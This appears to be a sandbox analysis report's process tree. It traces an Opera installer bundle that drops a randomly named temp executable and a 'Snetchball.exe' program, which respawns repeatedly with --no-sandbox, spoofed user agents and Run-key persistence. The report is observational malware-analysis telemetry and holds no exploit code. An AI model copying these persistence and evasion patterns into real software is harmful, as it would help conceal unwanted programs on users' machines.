C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\installer.exe" --backend --initial-pid=5044 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --show-intro-overlay --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481" --session-guid=8ec3b7bc-3549-4693-8c52-babf0ee96a70 --server-tracking-blob=YTczMjNjZTI2M2YzNjk0Mzk3N2Y1NDAzMjAzYTEwMzlmMzFjODVmMTAwODM0MzRlNmZjZDA1YmVmYTBlNTMxNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMDk2NDIwMy41OTYyIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiIzNzgxOTVkZi0xM2I3LTQ1MmQtOGM1My04NGE4NmVkY2RjNTgifQ== --silent --desktopshortcut=1 --install-subfolder=112.0.5197.247⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x284,0x288,0x28c,0x258,0x290,0x7ffc10091a60,0x7ffc10091a6c,0x7ffc10091a788⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --copyonly=0 --allusers=08⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0xb99f88,0xb99f94,0xb99fa09⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --ran-launcher --install-extension="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\be76331b95dfc399cd776d2fc68021e0db03cc4f.crx"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks system information in the registry
- Drops file in Windows directory
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2b8,0x2bc,0x2c0,0x2b4,0x2c4,0x7ffbf27da488,0x7ffbf27da498,0x7ffbf27da4a89⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1880,i,17594011384862017110,15210146391034587083,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=1876 /prefetch:29⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=1984,i,17594011384862017110,15210146391034587083,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:119⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=2360,i,17594011384862017110,15210146391034587083,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=2296 /prefetch:139⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2b8,0x2bc,0x2c0,0x2b4,0x2c4,0x7ffbf27da488,0x7ffbf27da498,0x7ffbf27da4a89⤵
- Executes dropped EXE
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141336481\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x234,0x238,0x23c,0x1f0,0x240,0xb99f88,0xb99f94,0xb99fa07⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\QbHuNyhi\gj2yOoXzj8b.exeC:\Users\Admin\AppData\Local\Temp\QbHuNyhi\gj2yOoXzj8b.exe /sid=3 /pid=10904⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exeC:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe6⤵
- Drops file in Windows directory
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2816 --field-trial-handle=2820,i,3342538951827033227,16871670938203175069,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:27⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3132 --field-trial-handle=2820,i,3342538951827033227,16871670938203175069,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3140 --field-trial-handle=2820,i,3342538951827033227,16871670938203175069,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3164 --field-trial-handle=2820,i,3342538951827033227,16871670938203175069,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3224 --field-trial-handle=2820,i,3342538951827033227,16871670938203175069,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Drops file in Windows directory
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2776 --field-trial-handle=2788,i,10421822920345999190,13273065204265856528,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:210⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3080 --field-trial-handle=2788,i,10421822920345999190,13273065204265856528,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:810⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2788,i,10421822920345999190,13273065204265856528,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:810⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3172 --field-trial-handle=2788,i,10421822920345999190,13273065204265856528,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3212 --field-trial-handle=2788,i,10421822920345999190,13273065204265856528,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2776 --field-trial-handle=2780,i,6767851087607454902,10111547737772532212,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:213⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3012 --field-trial-handle=2780,i,6767851087607454902,10111547737772532212,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3028 --field-trial-handle=2780,i,6767851087607454902,10111547737772532212,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=2780,i,6767851087607454902,10111547737772532212,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
- Drops file in Windows directory
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2880 --field-trial-handle=2884,i,8473137218192398075,16487166408131028669,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:216⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2952 --field-trial-handle=2884,i,8473137218192398075,16487166408131028669,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3456 --field-trial-handle=2884,i,8473137218192398075,16487166408131028669,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵
-
-
